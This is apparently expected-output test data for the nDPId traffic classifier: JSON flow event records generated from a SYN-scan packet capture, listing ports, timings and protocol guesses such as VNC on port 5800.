+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1688,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":995,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 